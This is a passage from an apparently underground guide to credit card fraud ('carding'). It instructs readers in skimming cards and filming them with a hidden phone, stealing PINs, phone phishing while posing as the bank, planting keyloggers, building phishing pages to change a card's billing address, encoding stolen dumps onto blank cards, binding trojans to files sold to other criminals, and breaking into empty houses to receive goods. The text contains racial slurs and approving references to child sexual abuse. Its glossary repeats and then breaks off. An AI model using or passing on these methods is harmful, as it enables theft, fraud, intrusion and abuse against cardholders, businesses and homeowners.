test it out 1st and have a camera on your phone that is at +least over 2 megapixel and allows long enough video recording times. The phone is set to video record +and on a lighting if needed, and taped underneath the desk for you to record both sides of the card for all +the information you need, as well as being quick you can get a lot more than 2 on, depending on how long + +each recording lasts, you may need to start more than one recording. +You need good reason to be going under the desk to get the chip and pin machine, so make the desk look +cluttered up and put shit in the way of everything, such as coat hangers and various other items; or you +could just flat out bullshit the customer and say that the chip and pin machine on the desk isn't working so +you need to get the other one, take their card and then go under searching the desk and quickly show it to +the camera phone and then get the chip and pin machine and put the card in it and then hand to the +customer to put in their pin as normal, unaware you have a CVV2 to later use when shopping online. +Skimming whilst on the job +For skimming you'll want a mini portable MSR500M reader that can be fitted on your waistline belt or of +course once again under the desk, if you're a cashier. But you'll also want a MSR206 writer if you plan on +writing the tracks to an embossed CR-80 piece of plastic later (you can make these yourself but +embossers are expensive and it's an expensive procedure, so wait a while until you do that yourself and +buy them from IRC (be careful, people like to rip with plastics, or you'll get shit quality if you don't watch +out). +If you plan to just sell the dumps on IRC then that's fine, but you'll still need the PIN as well, so if you're +a waiter you can get a cheeky peek at them putting their pin into the chip and pin device while you keep +hold of it slightly (have them put the pin in while they're sat down and you're standing up). It's much +easier to skim in a restaurant rather than clothing retail, as you don't have to think it out and set it up as +much. You can keep the MSR500M in your front pocket of the uniform you're wearing and pretend to be +giving the card a clean on the sleeve (bullshit and say the device won't read it), while really you're giving +it a swipe into your reader. This way the person doesn't even get suspicious because you don't take their +card out of sight with them. I guess you could do that technique with clothing retail too when you get +their card in your dirty little hands, but peeking for the PIN is harder or you'll have to have a friend +shoulder surf for it (or if they're on the next register have them use a sony cyber shot c902 camera phone +and pretend to have them talking on the phone while really they're recording the person next to them +putting in their PIN; cybershots are really inconspicuous looking with their cameras and VERY clear +[5mpixel]). +I'll go into detail what to do with the dumps you have later in the instore carding section. +Using carbonless receipts to get details (pretty outdated method) +If the store you work at hasn't gone carbonless on the transactions information then you can get most of +the info from the receipt you get a copy of for yourself and note down the pin on this as well when/if you +get it. +Trashing +Trashing for receipts and credit reports (pretty outdated although still works) +Ever heard the expression "Another man's trash is another man's gold"? That's exactly what this is. You'd +be surprised how many people haven't heard of a paper shredder or bonfire. They just dump their +financial records containing SSN's/NI, full name, address, bank, credit card number, CVV, CVV2 etc. All +on forms people couldn't be bothered to dispose of properly because they thought they were JUST old +records. Again carders wok on the inside again for when they want to do trashing, a lot of janitors wear +rags but you'd be surprised how secretly rich most of them are (along with the other shit they steal from +work as well). But also from this if there is not enough info for you on the forms then there is definitely +the phone number of the mark on the form that they've scrapped; almost always, and if not then there is +enough info on their to look them up in the phone directory. Then of course you use social engineering +skills over the phone to get the extra info that you need. If you know of a store that is not carbonless, then +go trashing in the bins at the back of the store for the receipts with the credit card details on it. +Phishing over the phone +Phishing over the phone for details +Ever had telemarketers ask for your credit card info over the phone? (this is if you haven't already hung +up by just hearing a nigger or paki on the phone) chances are they're a carder. Believe it or not there are + +people actually stupid enough to fall for these obvious scams. Even more people fall for this if they +believe that the caller is from the credit card company itself or part of the secret service or credit fraud +investigations; the FBI, CIA and police have nothing at all to do with credit card fraud believe it or not. If +you sound professional or part of an important group such as investigations then people are more likely to +comply with you if they believe that their card has been used for credit fraud purposes and have to give +their credit card info and billing address for verification. The best time to call up the mark is when they +are at work as it'll take them by surprise and they'll be wanting to get it sorted asap so that they can get +back to work. Also if it's "serious" then the secret service don't wait for you to finish work before they +question you. Play along well to the part you're pretending to be. Some social engineering skills are +required and you must gain the experience of lying to people yourself. Before calling up the person find +out as much information about them as you can. +If you've stolen a CC from someone personally you can call them up pretending to be their bank and tell +them there has been some suspicious charges made to the credit card from places such as South Africa, +Nigeria, Turkey, Russia; places like that, get them to confirm their details (milk as much as you want out +of them, ask them bullshit security questions such as their mother's maiden name, address, etc; you may +as well, it'll make it easier to get a COB for you to use). +You can also get their PIN out of them if you want as well by either straight out asking them to confirm +it, or be crafty and after you've told them to verify their PIN you're putting them through to a different +department; then play some cheesy music down the phone for a few mins, have a female voice recording +(use AV vocie changer) asking them to input their PIN on their dialpad (this won't be as suspicious); get +these recorded so they can be decoded with DTMF decoding hardware/software later (although it's +expensive). Guessing DTMF tones is pretty easy too, but you need to know what each tone sounds like, +it's preferred to use decoding software to ensure you have it correct. +If you try hard enough you can get full info about anyone over the phone (I suggest using spoofcard for +this). +Keylogging for CVV2s +Hardware keylogging +First of all it's best if you use hardware keyloggers here that you put into the keyboard of a computer +belonging to an area where a lot of people are going online a lot and logging into e-mails, ebays, paypals +etc, pretty much giving you enough info for you to go searching through if you get in their e-mails, or +maybe you're lucky enough to get someone who is buying something online anyway. Get the keyloggers +from here: +Code: +http://tyner.com/datalogger/keykatcher.htm +And come back within 2 days time or so and collect the keylogger after doing some browsing yourself (as +to not look suspicious just coming in and then leaving a few seconds later). +Or of course you could set one up in a business and do the classic call in and do some social engineering +from the credit card company or secret service and have them go to the bank online and have them log in +to verify, or maybe even have them log in to a fake bank online made by yourself that will collect +anyone's info who logs in on it. +Carding Instore +Instore carding is the act of skimming a credit card and writing the dumps and track1+2 to a CR-80 piece +of plastic and then either cashing out at the ATM or shopping for goods instore, as long as you have the +PIN as well through whatever method you choose to use. +How it's done is through the use of thejerm software or any other magstripe utility software (thejerm is +the best to use). And you do it like this: +Written by: Acetrace +1. Load up thejerms software + +2. hit settings tab +3. hit "Defaults" in Leading Zeros box +4. hit "75 bpi" in Set Track 2 density box +5. go bak to actions +6. hit LoCo or HiCo in Coercivity box, depending on which you want to do +7. input your tracks 1 & 2 (without the % ; or ? symbols because the program already does it for you) +8. hit Write Card and swipe your card. (i usually do a read card afterwards to make sure everything went +ok) +9. GO SHOPPING!!! +Download thejerm from here: +Code: +PM ME FOR DOWNLOAD LINKS (OMNISCIENT) +I was a member of this site and it came from there so don't worry about it not being safe, I used this +software a lot back in the day. +Now how you should act when you go carding instore is pretty much common sense, but some people get +caught up in the moment with nerves, cockiness or just too much weird amounts of excitement. +Simple what you do, make sure you KNOW the PIN for the card you're using before you go, don't be +stuck at the counter trying to remember it. If you're going to be carding expensive goods then dress smart +for the occasion, wear brand named clothing (that you've previously carded ) or even a suit. It would +look suspicious someone with a hoodie going into a store and buying a Louis Vuitton watch, so walk in +with style. When you go instore, you ACT like you are using your own card, because essentially that's +what it is (well it is now anyway lol) no looking shifty and don't look at the fucking cameras; the cameras +mean nothing anyway, they don't know your name or where you live, they're not being watched half of +the time, so stop worrying about the fucking cameras; remember you're doing nothing wrong. When you +go in, don't rush take your time, browse around some other items. Find the item you want to card and +even ask the employee simple questions about it (if it's a TV or comp just ask questions about certain +specs and if it's good for playing video games on). You'll be most nervous at the checkout, just act as +normal as you always have been, don't make too much small talk but be polite and civil. Once you have +the good sin your hands don't bolt out the door, just say thank you and then casually walk out the door, +get to your car and then celebrate all you want. +Carding over the phone +Okay 1st of all do not be a dumb fuck now, do not call from your own phones at all. For extra lulz you +could use a beige box and call from someone else's phone but that's a totally different game all together +and is also a major felony to go agains tyou on the chance that you do get caught so we'll keep it simple +and use a payphone (it's not AS risky to phreak these but the only recent red box tones I have are from the +year 2007 and I'm pretty sure they'd have changed the system again...bastards, I'll check sometime though +. The next day postage is said so that they have less time to look up details on the order. Some cards will +have difficulty shipping to any address other than the billing address, but it doesn't hurt to try. If they start +to question you then just answer the questions and talk your way around the situation with your social +engineering skills; don't just run away from the questions or hang up straight away, otherwise that is +cause for suspicion and they may investigate. If all goes well you should have your item of choice +delivered to your drop location or a house of someone else's address who you don't know and call them +up saying that you called up the store and they've sent the package to the wrong address and it is still +sending there, and ask them if they could kindly keep and sign for the package and you'll pick it up after + +work (this is a last resort and only to be tried if you're good at talking to people, which you should be if +you're a carder). I recommend checking out the section on drops later on in this text. +I recommend using spoofcard for verification over the payphone, if they need to verify (if they won't send +without some verification which is usually the case). +IRC +Services provided in IRC +IRC is the main gathering for fellow carders, scam artists and rippers. To put it in a nut shell, IRC is THE +black market, unlike craigslist and eBay which are just black markets. You can get anything illegal off +IRC from CP to warez to CC details (which is what we want). +To concentrate on carding though you can buy: +CVVs +CVV2s +SSNs +Utility bill scans +CC scans +COB (a service to get someone to call up the victim's bank and get the billing address changed to your +drop) +Payment for using someone else's drop and then sending to you +Spyware +Fake ID/ ID scans +DUMPZ +Phisher pages +The list really is endless +There are a lot of advantages to using IRC networks and channels which I'll go into now: +- The channels are often underground and not known to many people, so they're harder to stumble upon +by some random guy. +- The messages can be encrypted so they can't be read by anyone happening to be on the network sniffing +the traffic. This makes it harder for investigators to uncover. +- Easier and quicker to communicate with mass amounts of like minded people. +- Variety of channels to go to if one doesn't suit you (there are MILLIONS and new ones being made +every second, guaranteed). +- And of course a varity of services, if you need something you can bet someone from the other side of +the world will be willing to share or/and sell to you. +There are a lot of disadvantages though, IRC is the equivalent of a backstreet alley, you'll be fine if you +stay cautious, here's what you should be weary of: +- Viruses +- If you don't have strong anti viruses and firewalls you will get infected (no norton shit, kaspersky and +NOD32 are what you want) +- Do not accept random .exes or any file for that matter +- It is easy to get ripped off, choose your forms of payments and who you deal with wisely +How to find carding channels (Will not go too much into this as there are secrets between fellow carders +which we like people interested enough to find out for themselves) +Here is the most commonly asked question I get asked by n00bies and fellow carders; where do you find +these channels? +If I'm being totally honest the best place to find out about them is through Nigerians; no bullshit that is + +where I found out about a lot of the carder channels I used, also how I found out about forums and their +IRCs too such as cardersplanet, darkmarket etc. How I found him out was just on a normal scam bait I +was doing, it wasn't a long one, but in the end he tried phishing me so I tried back and we had a laugh +about it; I was straight up with him and told him I wanted to get deeper into the game, I looked up to his +type of people and wanted to get rich/successful (I also shared the double claim secret about paypal with +him which got him trusting me a little bit) he then sent me an invite to cardersplanet (this site was full of +Nigerians). Eventually I went in the IRC (admittedly got ripped a few times) then started vending myself +under various diff nicknames, then moved onto different sites like darkmarket and cardingzone when I'd +got invites for them (although cardingzone is shit it's good to get in the IRC for starting off, you'll get +invited to better forums the more you hang out in IRC, trust me). Don't ask me for invites to cardingzone, +I was banned for ripping (I didn't rip anyone :angry +The quicker way is to use these and search for certain keywords: +Code: +http://www.irclinux.org +http://www.irctrace.com +http://www.irclog.org +http://www.rcarchive.info +http://www.irc-chat-logs.com +http://www.irseek.com/ +And of course don't forget google. +I'm only going to give you one clue for searching through google for a carding IRC, and that word is +"undernet". +Fellow carders don't like revealing their IRCs, and for obvious reasons. +My advice is find a scammer through e-mail, and chat to him; be witty with it but be respectful to a fellow +fraudster. +Vendors and how to approach them +Vendors are the people in IRC who are selling and providing the services for you. There are certain ways +you should speak to vendors otherwise they're going to rip you (remember this is the black market, this is +just like going up to a random drug dealer in the street and not knowing what you really want or what +you're getting into; you'll get ripped off). Ask as many questions as possible of what you want to know, if +you're buying a CVV2 ask to see proof of their details working (get them to make a small purchase +somewhere; they should show you a before and after and the limits that are there on the card [there are +methods out there of checking your balance; you can even get it through text/sms]. This is a market so +remember there are more people that will be willing to buy from that vendor, it's open for all, you can get +a full load of info including dumps for as low as ?3/$5, drops usually go for ?7; if someone is saying +higher prices don't be afraid to haggle down to these prices or a little bit lower. COBs go for a little bit +higher in ranges of ?15-?20 because the vendor needs to get full info on someone and then change the +billing address through the bank to where ever your drop is. +Now when you go in the channel don't fucking say or request anything, shut up and see what the vendors +are saying they have to offer and then send them a private message and talk to them. If any "vendor" +messages you 1st trying to push onto you to buy from them then they're most likely a ripper; however +don't piss off the rippers or assume someone is a ripper because you never know who is going to be there +to help you out later on down the line or who might be pissed off enough to fuck you over. +I can't give any big advice on not getting ripped in IRC because you don't personally know anyone in +there at all, you just have to take your chances (expect to get ripped your 1st few times going in there, just +don't go to them again, because if they get away with it once they'll definitely try again if you go back to +them). +DO NOT BUY ANY WU BUG(Western Union Bug); it is a massive ripper technique which is bullshit. + +The WU BUG used to work but was patched a looong time ago, most of the time now you'll get nothing +or you'll end up with a rootkit on your comp. Rippers always say ridiculous prices for these too such as +$200+; but if someone says lower prices it's still bullshit and most likely a rootkit/trojan/keylogger going +to be installed on your machine while you get some useless program that does nothing. +Ripping +Easy as hell to do, not much photoshop skills needed really either. +Bullshit and say you're selling full info (you're getting the info from fakenamegenerator.com or any credit +card gen program; of course they don't fucking work), if they want to see proof just use your own legit +CC or another stolen CC to buy something and show them proof of you buying it, except photoshop the +details to that which you're going to be giving him later. Take payment through Western Union ONLY +(since e-gold isn't around anymore), then just send him the bullshit info. +If they want the report to go to their phone via SMS then just spoof a text with an sms bomber saying +some bullshit reports. Then get the payment via WU. +To get victims you message them 1st, message out in the whole channel 1st and then PM random buyers +(look for ones requesting). +::::WU BUG:::: +seriously this is bullshit, all people are doing are showing buyers fake screenshots made in PS or are +actually making quick programs themselves and taking screens of them and then selling them, although +essentially they're useless. You want to do this, but you want to actually send them a file as well, but bind +a keylogger or trojan to it; not only can you rip them out of their cash to buy your infection but the info +you get from spying on them will be so much more as well ranging from their info to other stolen CC +info, you'll have a backdoor on what they do and can exploit it. +If you can't be bothered making fake screenshots then get them from other rippers trying to sell them, get +them to show you pics, vids and info; then use it for yourself and rip some n00bs. +Phishing for Change of billing +A billing address is the details used for a person's bank account and most often their credit cards and +everything else too, this includes their phone number too. +What a change of billing (COB) is in a nutshell is changing the billing address registered to the card to +your drop address you're gonna be using. When you want to card BIG at various online websites the +orders will look more legit that you're not sending it else where other than the one registered to the card +(obviously after you've changed the billing address), meaning the delivery of your goods will be quicker +and will require a lot less verification. +Most of the time you change the billing address over the phone but SOME banks will let you do it online; +when you phone up to change it you use spoofcard.com or the pay as you go mobile phone you're going +to be using when carding, or beige boxing +When changing the billing address you need to know as much info as possible about the person's billing +address you're changing, because the bank is going to ask you 3 security questions you set (such as +mother's maiden name) before they change it. +You can phish for details over the phone (see the phishin over the phone section above), however it's best +to use keyloggers and phisher pages for this with a MIX of over the phone. +Use through phishing pages +2 methods here, 1 including over the phone, one isn't. +The method without the phone is to just send a ton of e-mails out to random people and send them a html + +e-mail telling them they need to update their information before the account is suspended or their account +with the bank will be cancelled, you have them go to a phisher page off the template and the phisher +pages "requires" them to answer security questions like their mother's maiden name, their pet's name, you +know those type of questions. +Another method is to call them up pretending to be the bank and saying there have been different ip +ranges logging on their account and they need to confirm their details online, link them to the phisher +page and have them fill in the details; have the phisher page redirect to the actual online bank's login +page; then ask if they've done that over the phone, tell them to wait a minute while you confirm and check +it all out, say it's all clear and tell them to log in, they'll think nothing of it and you now have the answers +to their secret questions which you can give to the bank itself when you go to change the billing address. +Use through keylogging +This is my favourite method and what I told S_E last night in IRC. +You have a hardware (or software) keylogger set on someone's comp, use sock proxies when logging into +their online bank account and then change their password, call them up pretending to be the bank and then +get them to go to the actual online bank link and fill in their forgotten password options (answering secret +questions) or of course get them to go to your phisher page and fill in the details (this is if you want to +add more fields to get more info) then pretend to be checking it all over, then change their password again +to some random letters and numbers and give it to them to log back in (it doesn't matter because they're +keylogged and you'll get their new login if they change the password again anyway), you'll have all their +info logged down too for you to answer your questions when you call the bank. +Best time to do all of this is around the 10th day of the month (people usually get their credit reports at +the start of every month), this will give you plenty of time to card enough for the remaining days until +they see they're not getting their reports coming to them anymore (if you're crafty you can pretend to have +cancelled the online bank account for them after they've gave you the info you need to know; I used to do +this method and keep it going without them knowing). +You need as much info as possible when calling up the bank to change the billing address. +Drops and what you need to know about them +Drops and what you need to know about them +What drop locations are and what they?re used for +Well simply a drop location is an abandoned house, or any house that is not under your name or any of +your details. You can lead young children into these to make a sexy time with them, get items delivered to +them that you want no one else to find about or risking finding, or just use it to squat in if you have no +where else to go. Basically they are used in ways of keeping your nose clean and are used by mostly scam +artists and sex offenders. +How to find a drop location +There are many ways of finding a drop location for use, whether it temporarily or permanently (although I +suggest swapping and changing locations because my main last one I used got raided or broken into and +is boarded up and too hot to use); I will suggest 3 ways on how you can find some for you to use. +One final tip is don?t bother going for houses that are boarded up at the front where it is visible to passers +by (it?s okay if round the back is boarded up) +Way #1 +As just mentioned you can go about it many different ways but one of the ways the way I prefer to go +about it is you should be looking around some older housing estates and more ghetto areas (could also tie +in with the sob story you feed to a paedophile/child predator you are possibly scamming). For example in +Derby there is an area called Sinfin, but now there is 2 parts to it and they are New Sinfin and Old Sinfin. +Old Sinfin is the are you would want to go to, because it?s older it?s most likely to be alot more houses +abandoned or deemed unsafe (it?s bullshit). + +Or if you were lucky like I once were then you could ask around your mates if there are any empty houses +in their area. If there are then you?re in luck and can even have your friend keep tabs and watching over it +for you and give you details so you can keep it all under wraps and safe. It may be alot riskier with +neighbour hood watch morons, and nosey neighbours, but it?s still ideal and a little bit less suspicious +than the abandoned houses in the older estates, and this is because the older estates usually have all +abandoned houses close by, where as the odd one out covered with a street filled with inhabitants will +seem less suspicious to the postman. +Way #2 +Now this is a temporary way of finding a drop location, but is sometimes an effective ways and means of +getting what you need but has a bit more risk to it; and personally is a way I have never used even till +today. +Have you ever been eavesdropping on a conversation between a neighbour and one of their family +member?s or friends?, or been down the pub and heard the common as muck chavs boasting about a +holiday they are going away on for however long they say they?re going away for? +Well listen out for these type of conversations. Because them away on holiday means the house is most +likely going to be empty for however long they?re going away for. So if you already know where they +live then that?s great the job is made easier; if you know their first name and surname then look them up +in the phone directory and find their address to go along with the number. If you don?t know where they +live, or their name then just listen out to see if you can hear their names come up in conversation; just +remember that if it?s in the pub it?s most likely local to it that they live, so you could easily find out by +following them home and seeing. +Way #3 +Possibly the safest, easiest way of finding, and quickest way to get a drop location. +Most areas have houses up for sale am I right? +Or houses that are up for bidding on, am I right? +Well they have a website with a full list of your local area(s) that have houses up for bidding on and for +sale. +For example I would search Derbyhomefinders and look at the list on their site. +All of these houses are empty and often do not have a sign up outside them either (if they do then just +take it down and hide it somewhere for the time being). +The advantage to using the lists to find the drop locations to use is it will usually say when the bid is up or +if the house has been sold (this lets you know that it will not be ideal to use that certain house now it?s +most likely to be inhabited) and will have the houses on there that are still being bidded on and that are +still up for sale, these are the ones you want to be using. +The best thing about this though is that you have a full list of many different drops to use (like I said +earlier it?s best to switch drop locations and use many different ones) and it is updated with new ones +coming up and tells you full which ones are over and not usable. +You just need to know your agencies for housing and find their website. +Obtaining and using drop locations +You?re probably thinking now I?ve got/found one that?s great and everything but how the fuck do I keep +it a secret? +for way 1 + +this much is obvious that you do not tell anyone except your partner if you?re doing a team bait, and 1 +trustworthy friend to keep tabs on it if you are doing a bait on your own, and also the paedophile, but only +when he asks. But there is alot more to it than that, also maintaining your abandoned house and making +the postman think someone living there. +Appearance isn?t everything at all in any case and it isn?t for this either, but of course you try to make +yourself look as best as you can. The same principles are applied to keeping an abandoned house; you +should atleast try to get a new lock put on the door which you will also have a key for; just so that if any +druggies go there before you then they will have a tougher time getting in (of course it?s ideal you don?t +get somewhere known to druggies but this is an example of what use it could have) but also if there is a +fucked up lock on a door then it?s pretty damn obvious only low life scum or some criminal(s) are using +the place, so buy a new lock for the door and get it fitted on, whether you do it yourself or get assistance +from a friend who knows what they are doing. +Now as for overgrowing plants and weeds, you can only do so much without being suspected. Do not use +a lawn mower, use clippers and hack it as short as you can. It?s best to get all of this done when everyone +is at work during the day time; but in reality it isn?t ideal at all and most criminals don?t tend to bother +with this. Instead they will make it seem someone is in but is just too ill to do anything with the garden or +is just a lazy fucker. They do this by often writing up a note and sticking it to the door or leaving it on the +floor near the door saying something such as "No milk today please" or "Not in, please leave packages at +post office". +Write a few letters to yourself aswell ready to come on the same day as the parcel, this will make it look +like you get mail and not just the one off suspicious package now and then. +Now 2 alternatives, you can either get to the abandoned house and take the mail from the mailman while +acting like you live there (you must look the part as lazy or disabled if you have ingrown plants in "your" +garden) or you can leave a note saying to take any packages to the post office for pick up because you are +at work or something along those lines. +One final rule is do not be in and out of the hideout everyday or whatever, visit probably 2 or 3 times a +week. +Way 2 +Now there are 2 ways to go about this; you can either just get to the house early in the morning a little bit +just before the postman arrives and be at the house outside pretending you?re just about to leave and then +sign for the package (if you need to) and collect it off the postman and then be on your way after he?s +gone. Or if you?re good at bypassing alarms (I have a guide on burglary) or the house has no alarm then +you could bump key in at night time (not recommended) or during the day time the day before when +everyone else will be at work aswell, and hide out there for a bit (hell even take some food that is left in +the fridge and feed yourself since you?re spending the rest of the day and early morning there). Basic +rules are don?t have tv on too loud if at all, or if you do then put head phones on into the tv if it?s that old +of a model, and leave everything how it was left an say upstairs so incase any neighbours or anyone +looking after the house while the owners are away come in then you have time to hide. +Obviously if it?s a package you don?t have to sign for then you can stick up a note on the door early in +the morning before the post man comes saying to leave it round the back or what ever excuse you wanna +make up. +Way #3 +Easy, just as previously except you don?t have to be as cautious and often the alarms are disabled for that +time being anyway so you don?t have to worry as much if you bump key into it. +As also stated previously in this guide, if there are any up for bidding/for sale signs then take them down +and just get them out of the way. + +You can even go to this one the night before instead of day time because no one is hardly going to be +watching over this unless it?s in a neighbourhood watch area (in which case you chose the wrong area +anyway, you dumbass). +Some basic tips to keep in mind +-- Be there before the postman! can?t stress this enough, it?s too fucking obvious if you?re late. +-- When signing for packages, if you need to, then sign a fake signature (the sig can be any made up fake +shit) with your hand that you don?t write with, so it?s harder to trace incase things go tits up later on +down the line. +-- Take anything in any guide with a pinch of salt, things may be different circumstances for you and your +situations; guides are to b +Carding Vocabulary/Chat +-CC's that start with number 3xxx-xxxx-xxxx-xxxx are AMEX (or AmericanExpress) and their cvv2 is +with 4 digits (some RARE times with 3) +-CC's that start with number 4xxx-xxxx-xxxx-xxxx are VISA and their cvv2 is with 3 digits +-CC's that start with number 5xxx-xxxx-xxxx-xxxx are Mastercard and their cvv2 is with 3 digits +-CC's that start with number 6xxx-xxxx-xxxx-xxxx are Discover(or Novus) and their cvv2 is with 3 digits +(some RARE times with 4) +------------------------------------------------------------------------- +Bank-emitent (Issuing bank) - bank which has issued the card +Billing address - the card owner address +Drop - innerman. His task is to receive the money or goods and, accordingly, to give the part of the +earnings to you. +Biling - office, which has agreement with a bank. Also this office assumes payments for the cards. +Card bill - it's a Bank emitent card bill. +Bank-equirer - bank, in which the store opens the account. +Merchant account - bank account for accepting credit cards. +Merchant Bank - bank, through which occur the payments between the buyer and the salesman +(frequently it is used as synonym "bank-equirer"). +Cardholder - owner of the card. +Validity - suitability card using. +White plastic - a piece of the pure plastic, where the information is plot. +CR-80 - rectangular piece of pure white plastic (without the drawing image) with the size of a credit card + +with the magnetic strip. +Transaction - charege to the credit card +POS terminal (Point Of Sale terminal) - reading card device, which stands at commercial point. +PIN-code - the sequence, which consists of 4-12 numbers. It is known only to the owner of card. By +simple words password for the work with ATM and so on. +AVS - the card owner address checking. It is used for the confirmation of the card belonging exactly to its +holder. +"Globe" - card holographic gluing with the image of two hemispheres (MasterCard). +Pigeon (hen) - card holographic gluing with the image of the flying pigeon (VISA). +Reader - information reading device for the readout from the magnetic strip of card. +Encoder - read/write device for the magnetic track of the card. +Embosser - card symbol extrusion device. +Card printer - card information printing device. +Exp.date - card validity period. +Area code - the first of 3 or 6 numbers of the card owner phone. +CVV2, cvv, cvn - 3 or 4 additional numbers, which stand at the end of the number of card. +ePlus - program for checking the cards. +BIN - first 6 numbers of the card number due to those it is possible to learn what bank issued out the card +and what is the type of this card (ATM-card, credit, gold, etc.). Synonym of word "Prefix". +Chargeback - the cardholder's bank voids the removal of money from its card. +Dump - information, which is written to the magnetic strip of the card, it consists of 1,2 or 3 tracks. +Track (road) - a part of the dump with the specific information. Every 1-st track is the information about +the owner of the card, 2-nd track - information about the owner of card, about the bank issued the card, +etc. 3-rd track - it is possible to say - spare, it is used by stores for the addition of the points and other. +Slip - synonym to the word "cheque" (conformably to card settlings). +Card balance - money sum that finding on the card account. +MMN Mothers Maiden Name, important if you want to change the billing address +some terms: +Automated Clearing House (ACH) - the automated clearing house. The voluntary association of +depositors, which achieves clearing of checks and electronic units by the direct exchange of means +between the members of association. +Continuous Acqusition and Life-cycle Support (CALS) - the integrated system of the production +guaranteeing, purchase and expluatation. This system makes possible to computerize all data about the + +design, development, production, servicing and the propagation of the production. +Debit Card - Card, which resembles the credit card by the method of using, but making possible to realize +direct buyer account debiting at the moment of the purchase of goods or service. +Delivery Versus Payment (DVP) - the system of calculations in the operations with the valuable papers, +which ensures the mechanism, which guarantees that the delivery will occur only in the case of payment +and at the moment of payment. +Direcht debit - payment levy method, mainly, with the repetitive nature (lease pay, insurance reward, etc.) +with which the debitor authorizes his financial establishment to debit his current account when obtaining +of calculation on payment from the indicated creditor. +Electronic Fund Transfer (EFT) - the remittance of means, initiated from the terminal, telephone or +magnetic carrier (tape or diskette), by transfer of instructions or authorities to financial establishment, that +concern to the debiting or crediting of the account (see Electronic Fund Transfer/Point of Sale - +EFT/POS). +Electronic Fund Transfer/Point of Sale - EFT/POS - debiting from the electronic terminal, for the means +transfer purpose from the account of a buyer into the payment on the obligations, which arose in the +course of transaction at the point of sale. +Integrated Circuit (IC) Card - It is known also as chip card. Card equipped with one either several +computer micros-chip or integrated microcircuits for identification and storing of data or their special +treatment, utilized for the establishment of the authenticity of personal identification number (PIN), for +delivery of permission for the purchase, account balance checking and storing the personal records. In +certain cases, the card memory renewal during each use (renewed account balance). +Internet - the open world communication infrastructure, which consists of the interrelated computer +networks and which provides access to the remote information and information exchange between the +computers. +International Standardisation Organisation (ISO) - International organization, which carries out +standardization, with the staff office in Geneva, Switzerland. +Magnetic Ink Character Recignition (MICR) - System, which ensures the machine reading of the +information, substituted by magnetic inks in the lower part of the check, including the number of check, +the code of department, sum and the number of account. +RSA - the coding and autentification technology, developed in 1977 in MIT by Rivest, Shamir and +Adel'man, which subsequently opened their own company RSA Data Sechurity, Inc., purchased recently +by the company Security Dynamics Technologies, Inc. +Real-Time Gross Settlement (RTGS) - the payment method, with which the transfer of means is achieved +for each transaction in obtaining of instructions about the payment. Decrease the risk with the payment. +SSN (Social Security Number) - nine-digit number issued in US only to an individual. Its primary +purpose is to track individuals for taxation purposes. +Smart Card - card equipped with integrated circuit and microprocessor, capable to carrying out the +calculations. +System risk - the risk, with which the incapacity of one of the payment system participants either +financial market participants as a whole to fullfill their obligations causes the incapacity of other +participants or financial establishments to fulfill its obligations (including obligations regarding the +realization of calculations in means transfer systems) properly. This failure can cause significant liquidity + +or crediting problems and, as result, it can cause loss to the stability of financial markets (with the +subsequent action on the level of economic activity). +Truncation - procedure, which makes it possible to limit the physical displacements of a paper document, +in the ideal version, by the bank of the first presentation, by the replacement by electronic transfer of +entire or part of the information, which is contained on this document (check). +Tipper - a machine designed for use with PVC plastic cards to create raised print. (basically a plastic card +embosser) +COB - Change of billing. Used for online carding, to change the billing address of a card since Online +Stores will only ship large items if the billing and shipping address match. You can obtain these from +vendors in CP. Once you have this, you can easily change the card address to that of your drop so that the +stores ship items to your drop, since the billing and shipping addresses will match. +DOB - Date of birth of the card owner +Carding Vocabulary/ TERMS +-CC's that start with number 3xxx-xxxx-xxxx-xxxx are AMEX (or AmericanExpress) and their cvv2 is +with 4 digits (some RARE times with 3) +-CC's that start with number 4xxx-xxxx-xxxx-xxxx are VISA and their cvv2 is with 3 digits +-CC's that start with number 5xxx-xxxx-xxxx-xxxx are Mastercard and their cvv2 is with 3 digits +-CC's that start with number 6xxx-xxxx-xxxx-xxxx are Discover(or Novus) and their cvv2 is with 3 digits +(some RARE times with 4) +------------------------------------------------------------------------- +Bank-emitent (Issuing bank) - bank which has issued the card +Billing address - the card owner address +Drop - innerman. His task is to receive the money or goods and, accordingly, to give the part of the +earnings to you. +Biling - office, which has agreement with a bank. Also this office assumes payments for the cards. +Card bill - it's a Bank emitent card bill. +Bank-equirer - bank, in which the store opens the account. +Merchant account - bank account for accepting credit cards. +Merchant Bank - bank, through which occur the payments between the buyer and the salesman +(frequently it is used as synonym "bank-equirer"). +Cardholder - owner of the card. +Validity - suitability card using. + +White plastic - a piece of the pure plastic, where the information is plot. +CR-80 - rectangular piece of pure white plastic (without the drawing image) with the size of a credit card +with the magnetic strip. +Transaction - charege to the credit card +POS terminal (Point Of Sale terminal) - reading card device, which stands at commercial point. +PIN-code - the sequence, which consists of 4-12 numbers. It is known only to the owner of card. By +simple words password for the work with ATM and so on. +AVS - the card owner address checking. It is used for the confirmation of the card belonging exactly to its +holder. +"Globe" - card holographic gluing with the image of two hemispheres (MasterCard). +Pigeon (hen) - card holographic gluing with the image of the flying pigeon (VISA). +Reader - information reading device for the readout from the magnetic strip of card. +Encoder - read/write device for the magnetic track of the card. +Embosser - card symbol extrusion device. +Card printer - card information printing device. +Exp.date - card validity period. +Area code - the first of 3 or 6 numbers of the card owner phone. +CVV2, cvv, cvn - 3 or 4 additional numbers, which stand at the end of the number of card. +ePlus - program for checking the cards. +BIN - first 6 numbers of the card number due to those it is possible to learn what bank issued out the card +and what is the type of this card (ATM-card, credit, gold, etc.). Synonym of word "Prefix". +Chargeback - the cardholder's bank voids the removal of money from its card. +Dump - information, which is written to the magnetic strip of the card, it consists of 1,2 or 3 tracks. +Track (road) - a part of the dump with the specific information. Every 1-st track is the information about +the owner of the card, 2-nd track - information about the owner of card, about the bank issued the card, +etc. 3-rd track - it is possible to say - spare, it is used by stores for the addition of the points and other. +Slip - synonym to the word "cheque" (conformably to card settlings). +Card balance - money sum that finding on the card account. +MMN Mothers Maiden Name, important if you want to change the billing address +some terms: +Automated Clearing House (ACH) - the automated clearing house. The voluntary association of +depositors, which achieves clearing of checks and electronic units by the direct exchange of means +between the members of association. + +Continuous Acqusition and Life-cycle Support (CALS) - the integrated system of the production +guaranteeing, purchase and expluatation. This system makes possible to computerize all data about the +design, development, production, servicing and the propagation of the production. +Debit Card - Card, which resembles the credit card by the method of using, but making possible to realize +direct buyer account debiting at the moment of the purchase of goods or service. +Delivery Versus Payment (DVP) - the system of calculations in the operations with the valuable papers, +which ensures the mechanism, which guarantees that the delivery will occur only in the case of payment +and at the moment of payment. +Direcht debit - payment levy method, mainly, with the 